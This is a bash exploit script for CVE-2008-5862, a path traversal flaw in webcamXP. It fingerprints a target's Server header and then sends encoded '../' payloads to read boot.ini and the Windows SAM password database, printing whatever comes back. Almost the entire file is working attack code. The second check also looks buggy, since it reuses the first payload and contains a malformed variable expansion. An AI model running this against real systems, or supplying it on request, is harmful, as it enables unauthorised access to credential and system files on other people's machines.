CVE-2008-5862.sh

#!/bin/bash

Y='\e[33m'
G='\e[32m'
B='\e[34m'
R='\e[31m'
W='\e[97m'
C='\e[36m'

target=$1
time_date=$(date +"%H:%M:%S")
payload_1=("/..%2F..%2F..%2F..%2F..%2Fboot.ini")
payload_2=("/..%2F..%2F..%2F..%2F..%2Fwindows/repair/sam")

if [[ $(HEAD -E $target | grep Server | awk '{print $2}') == *"webcamXP"* ]]; then
	echo -e "${W}[${C}$time_date${W}] ${W}[${G}INFO${W}] ${R}$target ${W}is running WebcamXP"
        sleep 2
        echo -e "${W}[${C}$time_date${W}] ${W}[${G}INFO${W}] Testing Payload${B}: ${R}$payload_1"
        curl -s -k --connect-timeout 10 --path-as-is "$1$payload_1"
	if [[ $(curl -k -I --silent --connect-timeout 10 "$target$payload_1" | grep HTTP | awk '{print $2}') == *"200"* ]]; then
                echo -e "${W}[${C}$time_date${W}] ${W}[${G}INFO${W}] ${R}$target ${W}Payload valid${B}: ${R}$target$payload_1"
		sleep 2
		echo -e "${W}[${C}$time_date${W}] ${W}[${G}INFO${W}] ${W}Dumping data$"
		curl -s -k --path-as-is "$1$payload_1"
	else
		echo -e "${W}[${C}$time_date${W}] ${W}[${Y}WARNING${W}] Payload not valid${B}: ${R}${$payload_1}"
	fi
        
	echo -e "${W}[${C}$time_date${W}] ${W}[${G}INFO${W}] ${R}$target ${W}is running WebcamXP"
        sleep 2
        echo -e "${W}[${C}$time_date${W}] ${W}[${G}INFO${W}] Testing Payload${B}: ${R}$payload_1"
	curl -s -k --connect-timeout 10 --path-as-is "$1$payload_1"
	if [[ $(curl -k -I --silent --connect-timeout 10 "$target$payload_2" | grep HTTP | awk '{print $2}') == *"200"* ]]; then
		echo -e "${W}[${C}$time_date${W}] ${W}[${G}INFO${W}] ${R}$target ${W}Payload valid${B}: ${R}$target$payload_2"
                sleep 2
                echo -e "${W}[${C}$time_date${W}] ${W}[${G}INFO${W}] ${W}Dumping data$"
                curl -s -k --connect-timeout 10 --path-as-is "$1$payload_1"
        else
                echo -e "${W}[${C}$time_date${W}] ${W}[${Y}WARNING${W}] Payload not valid${B}: ${R}$payload_2"
        fi
else
	echo -e "${W}[${C}${time_date}${W}] ${W}[${G}INFO${W}] ${R}$target ${W}not running WebcamXP"
	exit
fi